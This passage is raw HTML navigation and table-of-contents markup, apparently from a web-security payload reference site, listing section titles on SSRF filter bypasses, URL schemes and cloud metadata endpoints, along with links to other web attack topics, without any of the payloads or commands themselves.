</a>
</li>
<li class="md-nav__item">
<a href="#sftp" class="md-nav__link">
<span class="md-ellipsis">
SFTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tftp" class="md-nav__link">
<span class="md-ellipsis">
TFTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ldap" class="md-nav__link">
<span class="md-ellipsis">
LDAP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#gopher" class="md-nav__link">
<span class="md-ellipsis">
Gopher
</span>
</a>
<nav class="md-nav" aria-label="Gopher">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#gopher-http" class="md-nav__link">
<span class="md-ellipsis">
Gopher HTTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#gopher-smtp-back-connect-to-1337" class="md-nav__link">
<span class="md-ellipsis">
Gopher SMTP - Back connect to 1337
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#gopher-smtp-send-a-mail" class="md-nav__link">
<span class="md-ellipsis">
Gopher SMTP - send a mail
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#netdoc" class="md-nav__link">
<span class="md-ellipsis">
Netdoc
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#ssrf-exploiting-wsgi" class="md-nav__link">
<span class="md-ellipsis">
SSRF exploiting WSGI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-exploiting-redis" class="md-nav__link">
<span class="md-ellipsis">
SSRF exploiting Redis
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-exploiting-pdf-file" class="md-nav__link">
<span class="md-ellipsis">
SSRF exploiting PDF file
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#blind-ssrf" class="md-nav__link">
<span class="md-ellipsis">
Blind SSRF
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-to-xss" class="md-nav__link">
<span class="md-ellipsis">
SSRF to XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-from-xss" class="md-nav__link">
<span class="md-ellipsis">
SSRF from XSS
</span>
</a>
<nav class="md-nav" aria-label="SSRF from XSS">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#using-an-iframe" class="md-nav__link">
<span class="md-ellipsis">
Using an iframe
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#using-an-attachment" class="md-nav__link">
<span class="md-ellipsis">
Using an attachment
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-cloud-instances" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Cloud Instances
</span>
</a>
<nav class="md-nav" aria-label="SSRF URL for Cloud Instances">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#ssrf-url-for-aws" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for AWS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-aws-ecs" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for AWS ECS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-aws-elastic-beanstalk" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for AWS Elastic Beanstalk
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-aws-lambda" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for AWS Lambda
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-google-cloud" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Google Cloud
</span>
</a>
<nav class="md-nav" aria-label="SSRF URL for Google Cloud">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#add-an-ssh-key" class="md-nav__link">
<span class="md-ellipsis">
Add an SSH key
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-digital-ocean" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Digital Ocean
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-packetcloud" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Packetcloud
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-azure" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Azure
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-openstackrackspace" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for OpenStack/RackSpace
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-hp-helion" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for HP Helion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-oracle-cloud" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Oracle Cloud
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-alibaba" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Alibaba
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-kubernetes-etcd" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Kubernetes ETCD
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-docker" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Docker
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-rancher" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Rancher
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#labs" class="md-nav__link">
<span class="md-ellipsis">
Labs
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_48" >
<label class="md-nav__link" for="__nav_48" id="__nav_48_label" tabindex="0">
<span class="md-ellipsis">
Server Side Template Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_48_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_48">
<span class="md-nav__icon md-icon"></span>
Server Side Template Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_49" >
<label class="md-nav__link" for="__nav_49" id="__nav_49_label" tabindex="0">
<span class="md-ellipsis">
Tabnabbing
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_49_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_49">
<span class="md-nav__icon md-icon"></span>
Tabnabbing
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Tabnabbing/" class="md-nav__link">
<span class="md-ellipsis">
Tabnabbing
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_50" >
<label class="md-nav__link" for="__nav_50" id="__nav_50_label" tabindex="0">
<span class="md-ellipsis">
Type Juggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_50_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_50">
<span class="md-nav__icon md-icon"></span>
Type Juggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Type%20Juggling/" class="md-nav__link">
<span class="md-ellipsis">
Type Juggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51" >
<label class="md-nav__link" for="__nav_51" id="__nav_51_label" tabindex="0">
<span class="md-ellipsis">
Upload Insecure Files
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_51_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51">
<span class="md-nav__icon md-icon"></span>
Upload Insecure Files
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/" class="md-nav__link">
<span class="md-ellipsis">
Upload Insecure Files
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_2" >
<label class="md-nav__link" for="__nav_51_2" id="__nav_51_2_label" tabindex="0">
<span class="md-ellipsis">
CVE Ffmpeg HLS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_2">
<span class="md-nav__icon md-icon"></span>
CVE Ffmpeg HLS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS/" class="md-nav__link">
<span class="md-ellipsis">
FFmpeg HLS vulnerability
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_3" >
<label class="md-nav__link" for="__nav_51_3" id="__nav_51_3_label" tabindex="0">
<span class="md-ellipsis">
Configuration Apache .htaccess
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_3">
<span class="md-nav__icon md-icon"></span>
Configuration Apache .htaccess
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess/" class="md-nav__link">
<span class="md-ellipsis">
.htaccess upload
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_4" >
<label class="md-nav__link" for="__nav_51_4" id="__nav_51_4_label" tabindex="0">
<span class="md-ellipsis">
Configuration Busybox httpd.conf
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_4">
<span class="md-nav__icon md-icon"></span>
Configuration Busybox httpd.conf
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Configuration%20Busybox%20httpd.conf/" class="md-nav__link">
<span class="md-ellipsis">
Index
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_5" >
<label class="md-nav__link" for="__nav_51_5" id="__nav_51_5_label" tabindex="0">
<span class="md-ellipsis">
Configuration uwsgi.ini
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_5">
<span class="md-nav__icon md-icon"></span>
Configuration uwsgi.ini
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Configuration%20uwsgi.ini/" class="md-nav__link">
<span class="md-ellipsis">
uWSGI configuration file
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_6" >
<label class="md-nav__link" for="__nav_51_6" id="__nav_51_6_label" tabindex="0">
<span class="md-ellipsis">
Extension Flash
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_6">
<span class="md-nav__icon md-icon"></span>
Extension Flash
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Extension%20Flash/" class="md-nav__link">
<span class="md-ellipsis">
Index
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_7" >
<label class="md-nav__link" for="__nav_51_7" id="__nav_51_7_label" tabindex="0">
<span class="md-ellipsis">
Extension PDF JS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_7">
<span class="md-nav__icon md-icon"></span>
Extension PDF JS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Extension%20PDF%20JS/" class="md-nav__link">
<span class="md-ellipsis">
Generate PDF File Containing JavaScript Code
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_8" >
<label class="md-nav__link" for="__nav_51_8" id="__nav_51_8_label" tabindex="0">
<span class="md-ellipsis">
Picture ImageMagick
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_8">
<span class="md-nav__icon md-icon"></span>
Picture ImageMagick
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Picture%20ImageMagick/" class="md-nav__link">
<span class="md-ellipsis">
ImageMagick Exploits
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_9" >
<label class="md-nav__link" for="__nav_51_9" id="__nav_51_9_label" tabindex="0">
<span class="md-ellipsis">
Zip Slip
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_9">
<span class="md-nav__icon md-icon"></span>
Zip Slip
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Zip%20Slip/" class="md-nav__link">
<span class="md-ellipsis">
Zip Slip
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_52" >
<label class="md-nav__link" for="__nav_52" id="__nav_52_label" tabindex="0">
<span class="md-ellipsis">
Web Cache Deception
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_52_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_52">
<span class="md-nav__icon md-icon"></span>
Web Cache Deception
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Web%20Cache%20Deception/" class="md-nav__link">
<span class="md-ellipsis">
Web Cache Deception
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_53" >
<label class="md-nav__link" for="__nav_53" id="__nav_53_label" tabindex="0">
<span class="md-ellipsis">
Web Sockets
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_53_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_53">
<span class="md-nav__icon md-icon"></span>
Web Sockets
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Web%20Sockets/" class="md-nav__link">
<span class="md-ellipsis">
Web Sockets
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_54" >
<label class="md-nav__link" for="__nav_54" id="__nav_54_label" tabindex="0">
<span class="md-ellipsis">
XPATH Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_54_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_54">
<span class="md-nav__icon md-icon"></span>
XPATH Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XPATH%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XPATH Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_55" >
<label class="md-nav__link" for="__nav_55" id="__nav_55_label" tabindex="0">
<span class="md-ellipsis">
XSLT Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_55_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_55">
<span class="md-nav__icon md-icon"></span>
XSLT Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XSLT%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XSLT Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_56" >
<label class="md-nav__link" for="__nav_56" id="__nav_56_label" tabindex="0">
<span class="md-ellipsis">
XSS Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_56_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_56">
<span class="md-nav__icon md-icon"></span>
XSS Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XSS%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cross Site Scripting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/XSS%20in%20Angular/" class="md-nav__link">
<span class="md-ellipsis">
XSS in Angular and AngularJS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../XSS%20Injection/XSS%20with%20Relative%20Path%20Overwrite/" class="md-nav__link">
<span class="md-ellipsis">
XSS with Relative Path Overwrite - IE 8/9 and lower
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_57" >
<label class="md-nav__link" for="__nav_57" id="__nav_57_label" tabindex="0">
<span class="md-ellipsis">
XXE Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_57_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_57">
<span class="md-nav__icon md-icon"></span>
XXE Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XXE%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XML External Entity
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_58" >
<label class="md-nav__link" for="__nav_58" id="__nav_58_label" tabindex="0">
<span class="md-ellipsis">
LEARNING AND SOCIALS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_58_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_58">
<span class="md-nav__icon md-icon"></span>
LEARNING AND SOCIALS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/BOOKS/" class="md-nav__link">
<span class="md-ellipsis">
Books
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/TWITTER/" class="md-nav__link">
<span class="md-ellipsis">
Twitter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/YOUTUBE/" class="md-nav__link">
<span class="md-ellipsis">
Youtube
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_59" >
<label class="md-nav__link" for="__nav_59" id="__nav_59_label" tabindex="0">
<span class="md-ellipsis">
template vuln
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_59_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_59">
<span class="md-nav__icon md-icon"></span>
template vuln
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../_template_vuln/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Title
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#payloads-with-localhost" class="md-nav__link">
<span class="md-ellipsis">
Payloads with localhost
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-filters" class="md-nav__link">
<span class="md-ellipsis">
Bypassing filters
</span>
</a>
<nav class="md-nav" aria-label="Bypassing filters">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#bypass-using-https" class="md-nav__link">
<span class="md-ellipsis">
Bypass using HTTPS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with" class="md-nav__link">
<span class="md-ellipsis">
Bypass localhost with [::]
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with-a-domain-redirection" class="md-nav__link">
<span class="md-ellipsis">
Bypass localhost with a domain redirection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with-cidr" class="md-nav__link">
<span class="md-ellipsis">
Bypass localhost with CIDR
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-a-decimal-ip-location" class="md-nav__link">
<span class="md-ellipsis">
Bypass using a decimal IP location
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-octal-ip" class="md-nav__link">
<span class="md-ellipsis">
Bypass using octal IP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-ipv6ipv4-address-embedding" class="md-nav__link">
<span class="md-ellipsis">
Bypass using IPv6/IPv4 Address Embedding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-malformed-urls" class="md-nav__link">
<span class="md-ellipsis">
Bypass using malformed urls
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-rare-address" class="md-nav__link">
<span class="md-ellipsis">
Bypass using rare address
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-url-encoding" class="md-nav__link">
<span class="md-ellipsis">
Bypass using URL encoding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-bash-variables" class="md-nav__link">
<span class="md-ellipsis">
Bypass using bash variables
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-tricks-combination" class="md-nav__link">
<span class="md-ellipsis">
Bypass using tricks combination
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-enclosed-alphanumerics" class="md-nav__link">
<span class="md-ellipsis">
Bypass using enclosed alphanumerics
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-unicode" class="md-nav__link">
<span class="md-ellipsis">
Bypass using unicode
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-filter_var-php-function" class="md-nav__link">
<span class="md-ellipsis">
Bypass filter_var() php function
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-against-a-weak-parser" class="md-nav__link">
<span class="md-ellipsis">
Bypass against a weak parser
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-using-a-redirect" class="md-nav__link">
<span class="md-ellipsis">
Bypassing using a redirect
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-using-typeurl" class="md-nav__link">
<span class="md-ellipsis">
Bypassing using type=url
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-using-dns-rebinding-toctou" class="md-nav__link">
<span class="md-ellipsis">
Bypassing using DNS Rebinding (TOCTOU)
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-using-jar-protocol-java-only" class="md-nav__link">
<span class="md-ellipsis">
Bypassing using jar protocol (java only)
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#ssrf-exploitation-via-url-scheme" class="md-nav__link">
<span class="md-ellipsis">
SSRF exploitation via URL Scheme
</span>
</a>
<nav class="md-nav" aria-label="SSRF exploitation via URL Scheme">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#file" class="md-nav__link">
<span class="md-ellipsis">
File
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#http" class="md-nav__link">
<span class="md-ellipsis">
HTTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#dict" class="md-nav__link">
<span class="md-ellipsis">
Dict
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#sftp" class="md-nav__link">
<span class="md-ellipsis">
SFTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tftp" class="md-nav__link">
<span class="md-ellipsis">
TFTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ldap" class="md-nav__link">
<span class="md-ellipsis">
LDAP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#gopher" class="md-nav__link">
<span class="md-ellipsis">
Gopher
</span>
</a>
<nav class="md-nav" aria-label="Gopher">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#gopher-http" class="md-nav__link">
<span class="md-ellipsis">
Gopher HTTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#gopher-smtp-back-connect-to-1337" class="md-nav__link">
<span class="md-ellipsis">
Gopher SMTP - Back connect to 1337
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#gopher-smtp-send-a-mail" class="md-nav__link">
<span class="md-ellipsis">
Gopher SMTP - send a mail
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#netdoc" class="md-nav__link">
<span class="md-ellipsis">
Netdoc
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#ssrf-exploiting-wsgi" class="md-nav__link">
<span class="md-ellipsis">
SSRF exploiting WSGI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-exploiting-redis" class="md-nav__link">
<span class="md-ellipsis">
SSRF exploiting Redis
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-exploiting-pdf-file" class="md-nav__link">
<span class="md-ellipsis">
SSRF exploiting PDF file
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#blind-ssrf" class="md-nav__link">
<span class="md-ellipsis">
Blind SSRF
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-to-xss" class="md-nav__link">
<span class="md-ellipsis">
SSRF to XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-from-xss" class="md-nav__link">
<span class="md-ellipsis">
SSRF from XSS
</span>
</a>
<nav class="md-nav" aria-label="SSRF from XSS">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#using-an-iframe" class="md-nav__link">
<span class="md-ellipsis">
Using an iframe
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#using-an-attachment" class="md-nav__link">
<span class="md-ellipsis">
Using an attachment
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-cloud-instances" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Cloud Instances
</span>
</a>
<nav class="md-nav" aria-label="SSRF URL for Cloud Instances">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#ssrf-url-for-aws" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for AWS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-aws-ecs" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for AWS ECS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-aws-elastic-beanstalk" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for AWS Elastic Beanstalk
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-aws-lambda" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for AWS Lambda
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-google-cloud" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Google Cloud
</span>
</a>
<nav class="md-nav" aria-label="SSRF URL for Google Cloud">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#add-an-ssh-key" class="md-nav__link">
<span class="md-ellipsis">
Add an SSH key
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-digital-ocean" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Digital Ocean
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-packetcloud" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Packetcloud
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-azure" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Azure
</span>
</a>
</li>
<li class="md-nav__item">
